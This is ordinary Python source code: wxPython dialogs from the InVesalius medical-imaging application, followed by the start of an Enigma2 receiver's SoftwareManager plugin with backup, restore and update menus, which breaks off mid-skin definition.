            main_sizer.Add(baud_rate_text_and_dropdown, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
        main_sizer.Add((5, 5))
        main_sizer.Add(btnsizer, 0, wx.EXPAND)
        main_sizer.Add((5, 5))
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)

        self.CenterOnParent()

    def GetCOMPort(self):
        """Return the selected COM port name (e.g. 'COM3' or '/dev/ttyUSB0')."""
        com_port = self.com_port_dropdown.GetString(self.com_port_dropdown.GetSelection())
        return com_port

    def GetBaudRate(self):
        """Return the selected baud rate as a string, or None if the baud-rate
        dropdown was not shown."""
        if not self.select_baud_rate:
            return None
        baud_rate = self.baud_rate_dropdown.GetString(self.baud_rate_dropdown.GetSelection())
        return baud_rate
class ManualWWWLDialog(wx.Dialog):
    """Dialog to type window width (WW) and window level (WL) values by hand
    and broadcast them to the viewers through the Publisher bus."""

    def __init__(self, parent):
        wx.Dialog.__init__(self, parent, -1, _("Set WW&WL manually"))
        self._init_gui()

    def _init_gui(self):
        # Imported here (not at module level) to avoid an import cycle with
        # the slice module — presumably; TODO confirm.
        import invesalius.data.slice_ as slc
        # Seed the text fields with the current WW/WL of the active slice.
        ww = slc.Slice().window_width
        wl = slc.Slice().window_level

        self.txt_wl = wx.TextCtrl(self, -1, str(int(wl)))
        wl_sizer = wx.BoxSizer(wx.HORIZONTAL)
        wl_sizer.Add(wx.StaticText(self, -1, _("Window Level")), 0, wx.ALIGN_CENTER_VERTICAL)
        wl_sizer.Add(self.txt_wl, 1, wx.ALL | wx.EXPAND, 5)
        wl_sizer.Add(wx.StaticText(self, -1, _("WL")), 0, wx.ALIGN_CENTER_VERTICAL)

        self.txt_ww = wx.TextCtrl(self, -1, str(int(ww)))
        ww_sizer = wx.BoxSizer(wx.HORIZONTAL)
        ww_sizer.Add(wx.StaticText(self, -1, _("Window Width")), 0, wx.ALIGN_CENTER_VERTICAL)
        ww_sizer.Add(self.txt_ww, 1, wx.ALL | wx.EXPAND, 5)
        ww_sizer.Add(wx.StaticText(self, -1, _("WW")), 0, wx.ALIGN_CENTER_VERTICAL)

        btn_ok = wx.Button(self, wx.ID_OK)
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(wl_sizer, 1, wx.ALL | wx.EXPAND, 5)
        main_sizer.Add(ww_sizer, 1, wx.ALL | wx.EXPAND, 5)
        main_sizer.Add(btnsizer, 1, wx.ALL | wx.EXPAND, 5)

        btn_ok.Bind(wx.EVT_BUTTON, self.OnOK)
        btn_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
        self.Bind(wx.EVT_CLOSE, self.OnClose)

        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        main_sizer.SetSizeHints(self)
        self.Layout()
        self.Center()

    def OnOK(self, evt):
        # Non-numeric input is silently discarded: the dialog just closes
        # without changing anything.
        try:
            ww = int(self.txt_ww.GetValue())
            wl = int(self.txt_wl.GetValue())
        except ValueError:
            self.Close()
            return

        # Broadcast the new WW/WL and refresh every dependent view.
        Publisher.sendMessage('Bright and contrast adjustment image', window=ww, level=wl)
        const.WINDOW_LEVEL['Manual'] = (ww, wl)
        Publisher.sendMessage('Check window and level other')
        Publisher.sendMessage('Update window level value', window=ww, level=wl)
        #Necessary update the slice plane in the volume case exists
        Publisher.sendMessage('Update slice viewer')
        Publisher.sendMessage('Render volume viewer')
        self.Close()

    def OnCancel(self, evt):
        self.Close()

    def OnClose(self, evt):
        # Close always destroys the dialog (it is not reused).
        self.Destroy()
class SetSpacingDialog(wx.Dialog):
    """Ask the user for the image spacing when it could not be read from the
    image files.

    After ShowModal() returns wx.ID_OK, the values are available in
    spacing_new_x, spacing_new_y and spacing_new_z.
    """

    def __init__(
        self,
        parent,
        sx,
        sy,
        sz,
        title=_("Set spacing"),
        style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT | wx.STAY_ON_TOP,
    ):
        wx.Dialog.__init__(self, parent, -1, title=title, style=style)
        self.spacing_original_x = sx
        self.spacing_original_y = sy
        self.spacing_original_z = sz
        # Fix: initialize the "new" spacings with the original values.
        # Previously these attributes only came into existence inside
        # set_new_spacing(), so pressing OK immediately (or typing an
        # invalid value before any valid edit) raised AttributeError in
        # OnOk/OnSetNewSpacing.
        self.spacing_new_x = sx
        self.spacing_new_y = sy
        self.spacing_new_z = sz

        self._init_gui()
        self._bind_events()

    def _init_gui(self):
        self.txt_spacing_new_x = wx.TextCtrl(self, -1, value=str(self.spacing_original_x))
        self.txt_spacing_new_y = wx.TextCtrl(self, -1, value=str(self.spacing_original_y))
        self.txt_spacing_new_z = wx.TextCtrl(self, -1, value=str(self.spacing_original_z))

        sizer_new = wx.FlexGridSizer(3, 2, 5, 5)
        sizer_new.AddMany(
            (
                (wx.StaticText(self, -1, "Spacing X"), 0, wx.ALIGN_CENTER_VERTICAL),
                (self.txt_spacing_new_x, 1, wx.EXPAND),
                (wx.StaticText(self, -1, "Spacing Y"), 0, wx.ALIGN_CENTER_VERTICAL),
                (self.txt_spacing_new_y, 1, wx.EXPAND),
                (wx.StaticText(self, -1, "Spacing Z"), 0, wx.ALIGN_CENTER_VERTICAL),
                (self.txt_spacing_new_z, 1, wx.EXPAND),
            )
        )

        self.button_ok = wx.Button(self, wx.ID_OK)
        self.button_cancel = wx.Button(self, wx.ID_CANCEL)

        button_sizer = wx.StdDialogButtonSizer()
        button_sizer.AddButton(self.button_ok)
        button_sizer.AddButton(self.button_cancel)
        button_sizer.Realize()

        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(wx.StaticText(self, -1, _("It was not possible to obtain the image spacings.\nPlease set it correctly:")), 0, wx.EXPAND)
        main_sizer.Add(sizer_new, 1, wx.EXPAND | wx.ALL, 5)
        main_sizer.Add(button_sizer, 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 5)

        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        self.Layout()

    def _bind_events(self):
        # Validate/normalize each field when it loses focus.
        self.txt_spacing_new_x.Bind(wx.EVT_KILL_FOCUS, self.OnSetNewSpacing)
        self.txt_spacing_new_y.Bind(wx.EVT_KILL_FOCUS, self.OnSetNewSpacing)
        self.txt_spacing_new_z.Bind(wx.EVT_KILL_FOCUS, self.OnSetNewSpacing)

        self.button_ok.Bind(wx.EVT_BUTTON, self.OnOk)
        self.button_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)

    def OnSetNewSpacing(self, evt):
        # Unparseable input falls back to the last accepted value.
        try:
            new_spacing_x = float(self.txt_spacing_new_x.GetValue())
        except ValueError:
            new_spacing_x = self.spacing_new_x

        try:
            new_spacing_y = float(self.txt_spacing_new_y.GetValue())
        except ValueError:
            new_spacing_y = self.spacing_new_y

        try:
            new_spacing_z = float(self.txt_spacing_new_z.GetValue())
        except ValueError:
            new_spacing_z = self.spacing_new_z

        self.set_new_spacing(new_spacing_x, new_spacing_y, new_spacing_z)

    def set_new_spacing(self, sx, sy, sz):
        """Store sx/sy/sz as the new spacings and echo them in the fields."""
        self.spacing_new_x = sx
        self.spacing_new_y = sy
        self.spacing_new_z = sz
        # ChangeValue (not SetValue) avoids re-triggering change events.
        self.txt_spacing_new_x.ChangeValue(str(sx))
        self.txt_spacing_new_y.ChangeValue(str(sy))
        self.txt_spacing_new_z.ChangeValue(str(sz))

    def OnOk(self, evt):
        # A zero spacing is invalid: keep the dialog open and focus the
        # offending field instead of accepting.
        if self.spacing_new_x == 0.0:
            self.txt_spacing_new_x.SetFocus()
        elif self.spacing_new_y == 0.0:
            self.txt_spacing_new_y.SetFocus()
        elif self.spacing_new_z == 0.0:
            self.txt_spacing_new_z.SetFocus()
        else:
            self.EndModal(wx.ID_OK)

    def OnCancel(self, evt):
        self.EndModal(wx.ID_CANCEL)
class PeelsCreationDlg(wx.Dialog):
    """Dialog to choose the source for peel creation: an existing project
    mask (FROM_MASK) or an external mask file (FROM_FILES). The chosen
    method and file path are read from .method and .mask_path."""

    # Method identifiers for the two radio-button options.
    FROM_MASK = 1
    FROM_FILES = 2

    def __init__(self, parent, *args, **kwds):
        wx.Dialog.__init__(self, parent, *args, **kwds)

        self.mask_path = ''
        self.method = self.FROM_MASK

        self._init_gui()
        self._bind_events_wx()
        self.get_all_masks()

    def _init_gui(self):
        self.SetTitle("dialog")

        from_mask_stbox = self._from_mask_gui()
        from_files_stbox = self._from_files_gui()

        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(from_mask_stbox, 0, wx.EXPAND | wx.ALL, 5)
        main_sizer.Add(from_files_stbox, 0, wx.EXPAND | wx.ALL, 5)

        btn_sizer = wx.StdDialogButtonSizer()
        main_sizer.Add(btn_sizer, 0, wx.ALIGN_RIGHT | wx.ALL, 4)

        self.btn_ok = wx.Button(self, wx.ID_OK, "")
        self.btn_ok.SetDefault()
        btn_sizer.AddButton(self.btn_ok)

        self.btn_cancel = wx.Button(self, wx.ID_CANCEL, "")
        btn_sizer.AddButton(self.btn_cancel)

        btn_sizer.Realize()

        self.SetSizer(main_sizer)
        main_sizer.Fit(self)

        self.SetAffirmativeId(self.btn_ok.GetId())
        self.SetEscapeId(self.btn_cancel.GetId())

        self.Layout()

    def _from_mask_gui(self):
        # Radio + combobox row for picking one of the project's masks.
        mask_box = wx.StaticBox(self, -1, _("From mask"))
        from_mask_stbox = wx.StaticBoxSizer(mask_box, wx.VERTICAL)

        self.cb_masks = wx.ComboBox(self, wx.ID_ANY, choices=[])
        # RB_GROUP starts the radio group shared with from_files_rb.
        self.from_mask_rb = wx.RadioButton(self, -1, "", style = wx.RB_GROUP)

        internal_sizer = wx.BoxSizer(wx.HORIZONTAL)
        internal_sizer.Add(self.from_mask_rb, 0, wx.ALL | wx.EXPAND, 5)
        internal_sizer.Add(self.cb_masks, 1, wx.ALL | wx.EXPAND, 5)

        from_mask_stbox.Add(internal_sizer, 0, wx.EXPAND)

        return from_mask_stbox

    def _from_files_gui(self):
        # Radio + file-browse row for picking an external NIfTI mask file.
        session = ses.Session()
        last_directory = session.get('paths', 'last_directory_%d' % const.ID_NIFTI_IMPORT, '')

        files_box = wx.StaticBox(self, -1, _("From files"))
        from_files_stbox = wx.StaticBoxSizer(files_box, wx.VERTICAL)

        self.mask_file_browse = filebrowse.FileBrowseButton(self, -1, labelText=_("Mask file"),
                                                            fileMask=WILDCARD_NIFTI, dialogTitle=_("Choose Mask file"), startDirectory = last_directory,
                                                            changeCallback=lambda evt: self._set_files_callback(mask_path=evt.GetString()))
        self.from_files_rb = wx.RadioButton(self, -1, "")

        ctrl_sizer = wx.BoxSizer(wx.VERTICAL)
        ctrl_sizer.Add(self.mask_file_browse, 0, wx.ALL | wx.EXPAND, 5)

        internal_sizer = wx.BoxSizer(wx.HORIZONTAL)
        internal_sizer.Add(self.from_files_rb, 0, wx.ALL | wx.EXPAND, 5)
        internal_sizer.Add(ctrl_sizer, 0, wx.ALL | wx.EXPAND, 5)

        from_files_stbox.Add(internal_sizer, 0, wx.EXPAND)

        return from_files_stbox

    def _bind_events_wx(self):
        self.from_mask_rb.Bind(wx.EVT_RADIOBUTTON, self.on_select_method)
        self.from_files_rb.Bind(wx.EVT_RADIOBUTTON, self.on_select_method)

    def get_all_masks(self):
        # Imported here (not at module level) — presumably to avoid an
        # import cycle with the project module; TODO confirm.
        import invesalius.project as prj
        inv_proj = prj.Project()
        choices = [i.name for i in inv_proj.mask_dict.values()]
        # OK is only enabled when the project actually has masks.
        try:
            initial_value = choices[0]
            enable = True
        except IndexError:
            initial_value = ""
            enable = False

        self.cb_masks.SetItems(choices)
        self.cb_masks.SetValue(initial_value)
        self.btn_ok.Enable(enable)

    def on_select_method(self, evt):
        # Switch the method and re-evaluate whether OK can be enabled for it.
        radio_selected = evt.GetEventObject()
        if radio_selected is self.from_mask_rb:
            self.method = self.FROM_MASK
            if self.cb_masks.GetItems():
                self.btn_ok.Enable(True)
            else:
                self.btn_ok.Enable(False)
        else:
            self.method = self.FROM_FILES
            if self._check_if_files_exists():
                self.btn_ok.Enable(True)
            else:
                self.btn_ok.Enable(False)

    def _set_files_callback(self, mask_path=''):
        # Callback from the file-browse control; only affects OK availability
        # while the FROM_FILES method is active.
        if mask_path:
            self.mask_path = mask_path
        if self.method == self.FROM_FILES:
            if self._check_if_files_exists():
                self.btn_ok.Enable(True)
            else:
                self.btn_ok.Enable(False)

    def _check_if_files_exists(self):
        # True only when a path was chosen and it exists on disk.
        if self.mask_path and os.path.exists(self.mask_path):
            return True
        else:
            return False
| rmatsuda/invesalius3 | invesalius/gui/dialogs.py | Python | gpl-2.0 | 189,985 |
from Plugins.Plugin import PluginDescriptor
from Screens.Console import Console
from Screens.ChoiceBox import ChoiceBox
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from Screens.Standby import TryQuitMainloop
from Screens.Ipkg import Ipkg
from Screens.SoftwareUpdate import UpdatePlugin
from Components.ActionMap import ActionMap, NumberActionMap
from Components.Input import Input
from Components.Ipkg import IpkgComponent
from Components.Sources.StaticText import StaticText
from Components.ScrollLabel import ScrollLabel
from Components.Pixmap import Pixmap
from Components.MenuList import MenuList
from Components.Sources.List import List
from Components.Slider import Slider
from Components.Harddisk import harddiskmanager
from Components.config import config,getConfigListEntry, ConfigSubsection, ConfigText, ConfigLocations, ConfigYesNo, ConfigSelection
from Components.ConfigList import ConfigListScreen
from Components.Console import Console
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.SelectionList import SelectionList
from Components.PluginComponent import plugins
from Components.About import about
from Components.PackageInfo import PackageInfoHandler
from Components.Language import language
from Components.AVSwitch import AVSwitch
from Components.Task import job_manager
from Tools.Directories import pathExists, fileExists, resolveFilename, SCOPE_PLUGINS, SCOPE_CURRENT_PLUGIN, SCOPE_CURRENT_SKIN, SCOPE_METADIR
from Tools.LoadPixmap import LoadPixmap
from Tools.NumericalTextInput import NumericalTextInput
from enigma import eTimer, RT_HALIGN_LEFT, RT_VALIGN_CENTER, eListboxPythonMultiContent, eListbox, gFont, getDesktop, ePicLoad, eRCInput, getPrevAsciiCode, eEnv, iRecordableService
from cPickle import dump, load
from os import path as os_path, system as os_system, unlink, stat, mkdir, popen, makedirs, listdir, access, rename, remove, W_OK, R_OK, F_OK
from time import time, gmtime, strftime, localtime
from stat import ST_MTIME
from datetime import date
from twisted.web import client
from twisted.internet import reactor
from ImageWizard import ImageWizard
from BackupRestore import BackupSelection, RestoreMenu, BackupScreen, RestoreScreen, getBackupPath, getBackupFilename
from SoftwareTools import iSoftwareTools
# Persistent settings for the configuration backup feature: where backups are
# written and which files/directories they include.
config.plugins.configurationbackup = ConfigSubsection()
config.plugins.configurationbackup.backuplocation = ConfigText(default = '/media/hdd/', visible_width = 50, fixed_size = False)
config.plugins.configurationbackup.backupdirs = ConfigLocations(default=[eEnv.resolve('${sysconfdir}/enigma2/'), '/etc/network/interfaces', '/etc/wpa_supplicant.conf', '/etc/wpa_supplicant.ath0.conf', '/etc/wpa_supplicant.wlan0.conf', '/etc/resolv.conf', '/etc/default_gw', '/etc/hostname'])

# General software-manager settings.
config.plugins.softwaremanager = ConfigSubsection()
# Policy for handling locally modified config files during an online update.
config.plugins.softwaremanager.overwriteConfigFiles = ConfigSelection(
                [
                 ("Y", _("Yes, always")),
                 ("N", _("No, never")),
                 ("ask", _("Always ask"))
                ], "Y")
# Entry points: show the plugin in the setup menu and/or on the blue button.
config.plugins.softwaremanager.onSetupMenu = ConfigYesNo(default=False)
config.plugins.softwaremanager.onBlueButton = ConfigYesNo(default=False)
def write_cache(cache_file, cache_data):
    """Pickle cache_data into cache_file (highest/binary pickle protocol).

    Creates the parent directory of cache_file if it does not exist yet.
    """
    cache_dir = os_path.dirname(cache_file)  # hoisted: used three times below
    if not os_path.isdir(cache_dir):
        try:
            mkdir(cache_dir)
        except OSError:
            # The path exists but is not a directory (or cannot be created);
            # report and bail out instead of crashing on the open() below,
            # as the previous code did by falling through after the print.
            print('%s is a file' % cache_dir)
            return
    # Fix: protocol -1 (highest) is a *binary* pickle, so the file must be
    # opened in binary mode; the previous text-mode 'w' corrupts the data
    # on platforms with newline translation.
    fd = open(cache_file, 'wb')
    dump(cache_data, fd, -1)
    fd.close()
def valid_cache(cache_file, cache_ttl):
    """Return 1 if cache_file exists and is younger than cache_ttl seconds,
    else 0 (missing, unreadable or expired)."""
    try:
        mtime = stat(cache_file)[ST_MTIME]
    except OSError:
        # Fix: only stat() failures mean "no valid cache". The previous bare
        # except: also swallowed KeyboardInterrupt/SystemExit and any
        # programming error.
        return 0
    curr_time = time()
    if (curr_time - mtime) > cache_ttl:
        return 0
    else:
        return 1
def load_cache(cache_file):
    """Unpickle and return the object stored in cache_file."""
    # Fix: open in binary mode to match the binary pickle written by
    # write_cache(); try/finally guarantees the descriptor is closed even
    # when load() raises (truncated or corrupt cache).
    fd = open(cache_file, 'rb')
    try:
        cache_data = load(fd)
    finally:
        fd.close()
    return cache_data
class UpdatePluginMenu(Screen):
    """Top-level menu screen of the SoftwareManager plugin.

    Created with args == 0 for the main menu and args == 1 for the
    "Advanced options" sub menu; self.menu selects which entry set is
    built in __init__ and how a selection is dispatched in go().
    Third-party plugins can contribute extra entries via the
    WHERE_SOFTWAREMANAGER plugin descriptor hook.
    """
    skin = """
        <screen name="UpdatePluginMenu" position="center,center" size="610,410" title="Software management" >
            <ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
            <widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
            <ePixmap pixmap="skin_default/border_menu_350.png" position="5,50" zPosition="1" size="350,300" transparent="1" alphatest="on" />
            <widget source="menu" render="Listbox" position="15,60" size="330,290" scrollbarMode="showOnDemand">
                <convert type="TemplatedMultiContent">
                    {"template": [
                            MultiContentEntryText(pos = (2, 2), size = (330, 24), flags = RT_HALIGN_LEFT, text = 1), # index 0 is the MenuText,
                        ],
                    "fonts": [gFont("Regular", 22)],
                    "itemHeight": 25
                    }
                </convert>
            </widget>
            <widget source="menu" render="Listbox" position="360,50" size="240,300" scrollbarMode="showNever" selectionDisabled="1">
                <convert type="TemplatedMultiContent">
                    {"template": [
                            MultiContentEntryText(pos = (2, 2), size = (240, 300), flags = RT_HALIGN_CENTER|RT_VALIGN_CENTER|RT_WRAP, text = 2), # index 2 is the Description,
                        ],
                    "fonts": [gFont("Regular", 22)],
                    "itemHeight": 300
                    }
                </convert>
            </widget>
            <widget source="status" render="Label" position="5,360" zPosition="10" size="600,50" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
        </screen>"""

    def __init__(self, session, args = 0):
        # args: 0 = main menu, 1 = advanced sub menu (see class docstring).
        Screen.__init__(self, session)
        self.skin_path = plugin_path
        self.menu = args
        self.list = []
        # Help-text fragments appended to each entry's description column.
        self.oktext = _("\nPress OK on your remote control to continue.")
        self.menutext = _("Press MENU on your remote control for additional options.")
        self.infotext = _("Press INFO on your remote control for additional information.")
        self.text = ""
        self.backupdirs = ' '.join( config.plugins.configurationbackup.backupdirs.value )
        if self.menu == 0:
            print "building menu entries"
            # Each entry: (id, title, description, optional plugin callback).
            self.list.append(("install-extensions", _("Manage extensions"), _("\nManage extensions or plugins for your receiver" ) + self.oktext, None))
            self.list.append(("software-update", _("Software update"), _("\nOnline update of your receiver software." ) + self.oktext, None))
            self.list.append(("software-restore", _("Software restore"), _("\nRestore your receiver with a new firmware." ) + self.oktext, None))
            self.list.append(("system-backup", _("Backup system settings"), _("\nBackup your receiver settings." ) + self.oktext + "\n\n" + self.infotext, None))
            self.list.append(("system-restore",_("Restore system settings"), _("\nRestore your receiver settings." ) + self.oktext, None))
            self.list.append(("ipkg-install", _("Install local extension"), _("\nScan for local extensions and install them." ) + self.oktext, None))
            # Let external plugins register additional main-menu entries.
            for p in plugins.getPlugins(PluginDescriptor.WHERE_SOFTWAREMANAGER):
                if p.__call__.has_key("SoftwareSupported"):
                    callFnc = p.__call__["SoftwareSupported"](None)
                    if callFnc is not None:
                        if p.__call__.has_key("menuEntryName"):
                            menuEntryName = p.__call__["menuEntryName"](None)
                        else:
                            menuEntryName = _('Extended Software')
                        if p.__call__.has_key("menuEntryDescription"):
                            menuEntryDescription = p.__call__["menuEntryDescription"](None)
                        else:
                            menuEntryDescription = _('Extended Software Plugin')
                        self.list.append(('default-plugin', menuEntryName, menuEntryDescription + self.oktext, callFnc))
            if config.usage.setup_level.index >= 2: # expert+
                self.list.append(("advanced", _("Advanced options"), _("\nAdvanced options and settings." ) + self.oktext, None))
        elif self.menu == 1:
            # Advanced sub menu.
            self.list.append(("advancedrestore", _("Advanced restore"), _("\nRestore your backups by date." ) + self.oktext, None))
            self.list.append(("backuplocation", _("Select backup location"), _("\nSelect your backup device.\nCurrent device: " ) + config.plugins.configurationbackup.backuplocation.value + self.oktext, None))
            self.list.append(("backupfiles", _("Select backup files"), _("Select files for backup.") + self.oktext + "\n\n" + self.infotext, None))
            if config.usage.setup_level.index >= 2: # expert+
                self.list.append(("ipkg-manager", _("Packet management"), _("\nView, install and remove available or installed packages." ) + self.oktext, None))
            self.list.append(("ipkg-source",_("Select upgrade source"), _("\nEdit the upgrade source address." ) + self.oktext, None))
            # Plugin hook for extra advanced entries.
            for p in plugins.getPlugins(PluginDescriptor.WHERE_SOFTWAREMANAGER):
                if p.__call__.has_key("AdvancedSoftwareSupported"):
                    callFnc = p.__call__["AdvancedSoftwareSupported"](None)
                    if callFnc is not None:
                        if p.__call__.has_key("menuEntryName"):
                            menuEntryName = p.__call__["menuEntryName"](None)
                        else:
                            menuEntryName = _('Advanced software')
                        if p.__call__.has_key("menuEntryDescription"):
                            menuEntryDescription = p.__call__["menuEntryDescription"](None)
                        else:
                            menuEntryDescription = _('Advanced software plugin')
                        self.list.append(('advanced-plugin', menuEntryName, menuEntryDescription + self.oktext, callFnc))
        self["menu"] = List(self.list)
        self["key_red"] = StaticText(_("Close"))
        self["status"] = StaticText(self.menutext)
        # Digits 1-9 jump straight to the corresponding entry (see go()).
        self["shortcuts"] = NumberActionMap(["ShortcutActions", "WizardActions", "InfobarEPGActions", "MenuActions", "NumberActions"],
        {
            "ok": self.go,
            "back": self.close,
            "red": self.close,
            "menu": self.handleMenu,
            "showEventInfo": self.handleInfo,
            "1": self.go,
            "2": self.go,
            "3": self.go,
            "4": self.go,
            "5": self.go,
            "6": self.go,
            "7": self.go,
            "8": self.go,
            "9": self.go,
        }, -1)
        self.onLayoutFinish.append(self.layoutFinished)
        self.backuppath = getBackupPath()
        self.backupfile = getBackupFilename()
        self.fullbackupfilename = self.backuppath + "/" + self.backupfile
        self.onShown.append(self.setWindowTitle)
        self.onChangedEntry = []
        self["menu"].onSelectionChanged.append(self.selectionChanged)

    def createSummary(self):
        # LCD/front-display summary screen for this menu.
        from Screens.PluginBrowser import PluginBrowserSummary
        return PluginBrowserSummary

    def selectionChanged(self):
        # Push the current entry's title/description to summary listeners.
        item = self["menu"].getCurrent()
        if item:
            name = item[1]
            desc = item[2]
        else:
            name = "-"
            desc = ""
        for cb in self.onChangedEntry:
            cb(name, desc)

    def layoutFinished(self):
        # Always start with the first menu entry selected.
        idx = 0
        self["menu"].index = idx

    def setWindowTitle(self):
        self.setTitle(_("Software management"))

    def cleanup(self):
        # Release cached package data held by the shared software-tools object.
        iSoftwareTools.cleanupSoftwareTools()

    def getUpdateInfos(self):
        # Refresh the status line with the current update/connection state.
        if iSoftwareTools.NetworkConnectionAvailable is True:
            if iSoftwareTools.available_updates is not 0:
                self.text = _("There are at least %s updates available.") % (str(iSoftwareTools.available_updates))
            else:
                self.text = "" #_("There are no updates available.")
            if iSoftwareTools.list_updating is True:
                self.text += "\n" + _("A search for available updates is currently in progress.")
        else:
            self.text = _("No network connection available.")
        self["status"].setText(self.text)

    def handleMenu(self):
        # MENU key: open the SoftwareManager settings screen.
        self.session.open(SoftwareManagerSetup)

    def handleInfo(self):
        # INFO key: show the backup-file list for backup-related entries.
        current = self["menu"].getCurrent()
        if current:
            currentEntry = current[0]
            if currentEntry in ("system-backup","backupfiles"):
                self.session.open(SoftwareManagerInfo, mode = "backupinfo")

    def go(self, num = None):
        # Dispatch the selected (or number-key chosen) entry.
        # num comes from the digit keys and is 1-based.
        if num is not None:
            num -= 1
            if not num < self["menu"].count():
                return
            self["menu"].setIndex(num)
        current = self["menu"].getCurrent()
        if current:
            currentEntry = current[0]
            if self.menu == 0:
                if (currentEntry == "software-update"):
                    self.session.open(UpdatePlugin, self.skin_path)
                elif (currentEntry == "software-restore"):
                    self.session.open(ImageWizard)
                elif (currentEntry == "install-extensions"):
                    self.session.open(PluginManager, self.skin_path)
                elif (currentEntry == "system-backup"):
                    self.session.openWithCallback(self.backupDone,BackupScreen, runBackup = True)
                elif (currentEntry == "system-restore"):
                    # Only offer a restore when a backup archive actually exists.
                    if os_path.exists(self.fullbackupfilename):
                        self.session.openWithCallback(self.startRestore, MessageBox, _("Are you sure you want to restore the backup?\nYour receiver will restart after the backup has been restored!"))
                    else:
                        self.session.open(MessageBox, _("Sorry, no backups found!"), MessageBox.TYPE_INFO, timeout = 10)
                elif (currentEntry == "ipkg-install"):
                    # MediaScanner is an optional plugin; fall back to a notice.
                    try:
                        from Plugins.Extensions.MediaScanner.plugin import main
                        main(self.session)
                    except:
                        self.session.open(MessageBox, _("Sorry, %s has not been installed!") % ("MediaScanner"), MessageBox.TYPE_INFO, timeout = 10)
                elif (currentEntry == "default-plugin"):
                    # Entry contributed by an external plugin: run its callback.
                    self.extended = current[3]
                    self.extended(self.session, None)
                elif (currentEntry == "advanced"):
                    self.session.open(UpdatePluginMenu, 1)
            elif self.menu == 1:
                if (currentEntry == "ipkg-manager"):
                    self.session.open(PacketManager, self.skin_path)
                elif (currentEntry == "backuplocation"):
                    # Offer only writable, non-root mounted partitions.
                    parts = [ (r.description, r.mountpoint, self.session) for r in harddiskmanager.getMountedPartitions(onlyhotplug = False)]
                    for x in parts:
                        if not access(x[1], F_OK|R_OK|W_OK) or x[1] == '/':
                            parts.remove(x)
                    if len(parts):
                        self.session.openWithCallback(self.backuplocation_choosen, ChoiceBox, title = _("Please select medium to use as backup location"), list = parts)
                elif (currentEntry == "backupfiles"):
                    self.session.openWithCallback(self.backupfiles_choosen,BackupSelection)
                elif (currentEntry == "advancedrestore"):
                    self.session.open(RestoreMenu, self.skin_path)
                elif (currentEntry == "ipkg-source"):
                    self.session.open(IPKGMenu, self.skin_path)
                elif (currentEntry == "advanced-plugin"):
                    self.extended = current[3]
                    self.extended(self.session, None)

    def backupfiles_choosen(self, ret):
        # Persist the (possibly changed) list of directories to back up.
        self.backupdirs = ' '.join( config.plugins.configurationbackup.backupdirs.value )
        config.plugins.configurationbackup.backupdirs.save()
        config.plugins.configurationbackup.save()
        config.save()

    def backuplocation_choosen(self, option):
        # option is a ChoiceBox entry: (description, mountpoint, session) or None.
        oldpath = config.plugins.configurationbackup.backuplocation.getValue()
        if option is not None:
            config.plugins.configurationbackup.backuplocation.value = str(option[1])
        config.plugins.configurationbackup.backuplocation.save()
        config.plugins.configurationbackup.save()
        config.save()
        newpath = config.plugins.configurationbackup.backuplocation.getValue()
        if newpath != oldpath:
            # Make sure the backup directory exists on the new medium.
            self.createBackupfolders()

    def createBackupfolders(self):
        print "Creating backup folder if not already there..."
        self.backuppath = getBackupPath()
        try:
            if (os_path.exists(self.backuppath) == False):
                makedirs(self.backuppath)
        except OSError:
            self.session.open(MessageBox, _("Sorry, your backup destination is not writeable.\nPlease select a different one."), MessageBox.TYPE_INFO, timeout = 10)

    def backupDone(self,retval = None):
        # Callback from BackupScreen: report success or failure.
        if retval is True:
            self.session.open(MessageBox, _("Backup completed."), MessageBox.TYPE_INFO, timeout = 10)
        else:
            self.session.open(MessageBox, _("Backup failed."), MessageBox.TYPE_INFO, timeout = 10)

    def startRestore(self, ret = False):
        # Callback from the confirmation MessageBox before a settings restore.
        if (ret == True):
            self.exe = True
            self.session.open(RestoreScreen, runRestore = True)
class SoftwareManagerSetup(Screen, ConfigListScreen):
    """Settings screen for the SoftwareManager plugin.

    Exposes three config.plugins.softwaremanager options (overwrite config
    files on upgrade, show in setup menu, show on blue button).  Saving
    reloads the plugin list so menu/button changes take effect immediately.
    """
    skin = """
        <screen name="SoftwareManagerSetup" position="center,center" size="560,440" title="SoftwareManager setup">
            <ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
            <widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
            <widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
            <widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
            <widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
            <widget name="config" position="5,50" size="550,350" scrollbarMode="showOnDemand" />
